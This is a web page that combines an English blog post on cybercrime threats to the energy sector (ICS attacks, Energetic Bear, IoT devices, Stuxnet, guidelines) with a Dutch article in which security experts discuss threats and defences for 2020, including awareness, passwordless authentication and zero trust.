CYBERCRIME AND INDUSTRY #5: HOW CYBERCRIME IS AFFECTING THE ENERGY INDUSTRY

The USA is a major consumer of energy; a North American household uses, on average, 11,698 kilowatts per hour compared to the average Indian household, which uses 900 kilowatts per hour. According to the World Energy Council, North America is also one of the biggest energy producers in the world, as one of the top three producers of all types of energy, except hydropower. 

Critical Infrastructure Security and Cyber Terrorism

Cyber espionage and cyber terrorism / sabotage, are the main cyber threats targeting our energy sector. This sector holds much intellectual property and, as a critical infrastructure, is a seductive prime candidate for terrorism and sabotage, especially by state actors. 

One of the keys to the vulnerabilities within the energy sector is that our energy systems are becoming digitized to ensure improved efficiencies, and to keep up with the changing needs of the industry. This includes the connectivity requirements of the extended supply chains used within the sector. Industrial Control Systems (ICS) are part of this digitization program and are being connected up to the Cloud to allow distributed data capture and sharing. This has resulted in increasing their attack surface, making them increasingly vulnerable to cyber attack.  In a review by IBM X-Force, entitled, “Security Attacks on Industrial Control Systems”, IBM found a massive increase in ICS attacks in the three years prior to August 2015. Hacktivists and malicious insiders are carrying out these types of attacks, and the USA has had, by far, the greatest number of attacks at around 70% of the total. The attacks are increasing because of the change from closed systems to an Internet facing ICS.

Like many cyber security attacks, the vectors used are the usual suspects. Phishing, specifically spear phishing, is a key method being used to gain access to network resources and infect systems with malware.

A recent high profile attack that specifically targeted ICS’s was carried out by the group of cyber criminals known as ‘Dragonfly’ or ‘Energetic Bear’. The group used three types of attack vectors:

1.     Spear phishing emails targeting employees and supply chain members.

2.     Watering holes, i.e. malware infected sites that were commonly used by the targeted companies.

3.     Installation of Trojan malware into software code developed by third parties that was used to update ICS units.

The group attacked mainly U.S. and European based energy sector companies in the petroleum and electricity-generating sector. However, they went after suppliers to the sector as well. Energetic Bear is a perfect example of an attack capitalizing on Internet facing systems and a supply chain infection.

The Department of Energy in collaboration with the National Institute of Standards and technology (NIST) have developed a set of guidelines to use in the energy industry to help inform the Risk Management Process within a security strategy plan, “Cybersecurity Risk Management Process (RMP) Guideline”. Using sound advice such as this helps in informing a robust security strategy to manage energy sector targeted attacks.

Personal Energy, the Internet of Things and Cyber Security

A report by MarketsandMarkets has predicted that the Internet of Things (IoT) device market within the energy sector will be worth over $22 billion by 2020. This isn’t surprising, as the IoT has become very popular as a method of controlling energy supplies on a personal and business basis. Smart Grids and IoT devices, like Nest, give us the opportunity to generate data, which can then be used to ensure we have the right energy tariff. They can also be used to make sure we use our energy in the most efficient way, turning off lights remotely being one, small example, of the control features the IoT gives us. The Nest thermostat is one such device that helps consumers and offices make the most of their energy requirements.  However, as we’ve seen in previous posts, the IoT is a cyber criminal’s dream. An IoT device offers a way into our homes and offices. Connected up to Cloud platforms to collect and analyze data, they are open to the same sorts of web-based threats as any other Internet facing system. You can envision the scenario whereby a hacker has control of thermostats across the nation, exploiting them as methods of data extraction, energy control, and doors into other devices and accounts. It is even possible that the information gleaned from such devices would allow burglars to know when you’re away from home. Fortunately, white hat hackers are on the case and finding holes in IoT devices, like Nest, and offering fixes before the true hackers find them.

To help stem the potential tidal wave of IOT generated crime, the Online Trust Alliance (OTA) has built a framework of guidelines for ensuring IoT devices, in the energy sector and beyond, taking security and data privacy into account. It is up to the industry to follow this advice to protect consumers from IoT based cybercrime.

Switching Off Cybercrime Not the Lights

The Stuxnet virus that shut down the Iranian nuclear power industry, and that allegedly originated from state sponsors in the USA and Israel, is the most infamous energy sector attack in known history. We should expect that Stuxnet will be ‘out famed’ soon by a similar critical infrastructure based cyber attack, as our energy sector reaches out into the connected world and opens up our industrial systems to the world of cybercrime. Our energy infrastructures are too much of an interesting prospect to a cyber criminal group for them to not already be planning attacks. If we work in this sector, we are facing the challenges of new ways of working, but with those challenges we also need to face cybersecurity head on. Guidelines and frameworks can help us build robust and achievable security plans, that work across the entire energy ecosystem.


Bedreigingen en Kansen

Original Dutch article: http://my.socialtoaster.com/splash/cjbRT/ written by Annelies Heuvelmans

Ook dit jaar sprak Security Management weer met een aantal cybersecurity-experts over de bedreigingen waar we in 2020 rekening mee moeten houden en welke innovaties het tij gaan keren. Een sleutelrol is daarbij weggelegd voor de medewerker. Als deze het belang van goede beveiliging niet inziet, dan valt zelfs het beste securitybeleid als een kaartenhuis in elkaar.

Malware wordt massaal verstuurd

“De afgelopen jaren hebben cybercriminelen de wereld van operationele techniek (OT) ontdekt”, vertelt Bastiaan Bakker, directeur Business Development bij Motiv. Zo laat het Operational Security Trends Report van Fortinet zien dat maar liefst 77 procent van alle OT-managers de afgelopen 12 maanden te maken kreeg met malware.

Beschermen van vitale infrastructuren

Bakker legt uit: “Eén van de redenen hiervoor is de verregaande professionalisering van het criminele circuit. Cybercriminelen vormen steeds vaker een team van specialisten, die handig gebruik maken van kwetsbaarheden binnen bedrijven. Daarnaast zijn overheidsgestuurde hackgroepen actief die aanvals- en schadetechnieken uitvoeren binnen OT. We zien dan ook dat de vraag naar specialistische beveiliging van operationele techniek sterk toeneemt. Gezien de hoge mate van afhankelijkheid van operationele systemen, die bijvoorbeeld onze stroom- en drinkwatervoorziening regelen, speelt de beveiliging hiervan een cruciale rol. De omgevingen verschillen echter significant van klassieke IT-omgevingen. OT-omgevingen zijn vaak minder makkelijk te vervangen door veelal legacy en de hoge complexiteit van het domein.

Bewustwording van het personeel is een belangrijk onderdeel.

Bastiaan Bakker, Director of Business Development at Motive

Een eerste stap is dan ook het in kaart brengen van je OT-omgeving. Waar zie je koppelingen ontstaan tussen je IT- en OT-omgeving? En wie heeft waar toegang tot? Het beheer, evenals de autorisatie, moet goed en volwassen worden neergezet. Bewustwording van het personeel is hier een belangrijk onderdeel van. Je kunt je omgeving met de beste security-oplossingen uitrusten, maar als je personeel onvoldoende op de hoogte is van de cruciale rol die zij spelen als poortwachters van het bedrijf, heeft deze investering weinig nut.”

Gamification

Mats Ros, managing security en privacy consultant bij IT-dienstverlener ilionx, kan zich in deze uitspraak vinden. “Buiten het technisch afdwingen van goede security komen we in de IT-wereld altijd terug op één punt: de mens is de zwakste schakel. Mensen maken immers fouten. Natuurlijk zijn er al genoeg oplossingen en tooling om mensen te instrueren en naar een hoger bewustzijnsniveau te tillen, maar het daadwerkelijk meenemen van je medewerkers is lastiger. Wat ik merk, is dat slechts vijftig procent van de medewerkers echt aan de slag gaat met deze tooling. Dat is natuurlijk veel te laag. De andere helft ziet er het belang niet van in en zijn zodoende veel sneller vatbaar voor bijvoorbeeld een phishing mail.

Door gamification in te zetten wordt het draagvlak groter en de tooling leuker.

Mats Ros, Managing security and privacy consultant at IT Service Provider Ilionx

Door gamification in te zetten – een spelcomponent die medewerkers uitdaagt zich te meten met hun collega’s op een scoreboard – wordt het draagvlak groter en de tooling leuker. Zo ontwikkelden wij voor onze eigen ISO 27001 certificering een oplossing die precies hiervoor zorgt.

De SaaS-oplossing, inclusief puntentelling, kijkt onder andere naar hoeveel vragen je hebt beantwoord en hoe vaak je het goede antwoord geeft. Medewerkers kunnen hun resultaten vergelijken met collega’s, maar dit kan ook uitgeschakeld worden. Achievements en certificaten maken dit nog leuker. Iemand die ’s nachts een quiz succesvol voltooid, verdient bijvoorbeeld de achievement ‘nachtuil’. Zo krik je op een speelse manier het draagvlak flink omhoog én maak je je medewerkers bewust van de broodnodige bijdrage die zij leveren aan het veilig houden van de organisatie.”

Een wereld zonder wachtwoorden

Dirk Geeraerts, regional director for cloud protection and licensing activity bij Thales ziet een toekomst zonder wachtwoorden voor zich: “De tijd dat het gebruik van wachtwoorden alleen voldoende bescherming biedt, ligt ver achter ons. 70 procent van de werknemers hergebruikt wachtwoorden van werk en persoonlijke accounts. Niet verwonderlijk dat 81 procent van de hack gerelateerde datalekken begint bij de identiteit van een gebruiker, zoals een zwak of gestolen wachtwoord. In 2020 wordt een wereld zonder wachtwoorden steeds meer realiteit.”

Oplossing voor wachtwoorduitdaging

Geeraerts vervolgt: “Multi-factor authenticatie was tot nu toe de meest voor de hand liggende oplossing om de wachtwoorduitdaging aan te gaan. Er wordt toegang verleend aan een gebruiker op basis van zijn identiteit, iets wat hij bezit en iets wat hij weet. Alhoewel deze methode veiliger is dan het traditionele wachtwoord, is het minder gebruiksvriendelijk vanwege de tijdrovende handelingen. Access Management-oplossingen met wachtwoordloze beveiliging bieden hierin een uitkomst.

Er is nooit sprake van een one size fits all oplossing.

Dirk Geeraerts, regional director for cloud protection and licensing activity at Thales

PKI of een eenmalig wachtwoord via token of device wordt ingezet om gebruikers toegang te verlenen, in combinatie met biometrische gegevens of een PIN. Dit biedt een oplossing voor de kwetsbaarheid van traditionele wachtwoorden. Daarnaast kunnen organisaties hierdoor het inloggemak en de gebruiksvriendelijkheid vergroten. Wat echter niet vergeten mag worden: ook bij deze vorm van authenticatie is er nooit sprake van one size fits all. Het is altijd belangrijk om de authenticatiemethode af te stemmen op de beveiligingsbehoeften om het hoogste niveau van beveiliging te garanderen.”

Managed security services die organisaties ontzorgen

Organisaties zien weliswaar de noodzaak en hebben financiële ruimte om te investeren in security, maar het ontbreekt hen aan de mensen om security-oplossingen te laten renderen. “We zien dan ook een toename in de vraag naar managed security services, waarmee organisaties geheel ontzorgd worden. Deze trend zal zich in de komende jaren versterken. Tevens zien we de opkomst van de automatisering van security. Eenvoudige incidenten kunnen geautomatiseerd behandeld worden zodat engineers zich op de complexe incidenten kunnen richten. Zo wordt tevens het tekort aan security engineers opgevangen”, aldus Twan van Ravestein, Cyber Security Expert bij Telindus.

In 2020 zullen steeds meer organisaties het zero trust principe omarmen en het netwerk beschouwen zonder perimeter.

Twan van Ravestein, Cyber Security Expert at Telindus

Wie of wat kan je nog vertrouwen?

“Automatisering gebeurt langs verschillende assen in 2020. Met artificial intelligence en machine learning oplossingen kun je de analyse van het netwerkverkeer zo inrichten dat afwijkingen en vreemd gedrag, binnen de business context van de klant, snel gedetecteerd kunnen worden.

Vervolgens ben je in staat automatisch de juiste maatregelen te treffen om bijvoorbeeld lekken te herstellen. Systemen voor User Behaviour Analytics (UBA) en Security Orchestration, Automation and Response (SOAR) worden op deze manier steeds geavanceerder. Ten slotte zullen in 2020 steeds meer organisaties het zero trust principe omarmen en het netwerk beschouwen zonder perimeter. Je kunt, zeker in het cloud-tijdperk, niet meer spreken in termen van het veilige interne netwerk en de onveilige buitenwereld. Dit besef zal tot vele boardrooms doordringen”, besluit Van Ravestein.


nl_NLNederlands
en_USEnglish nl_NLNederlands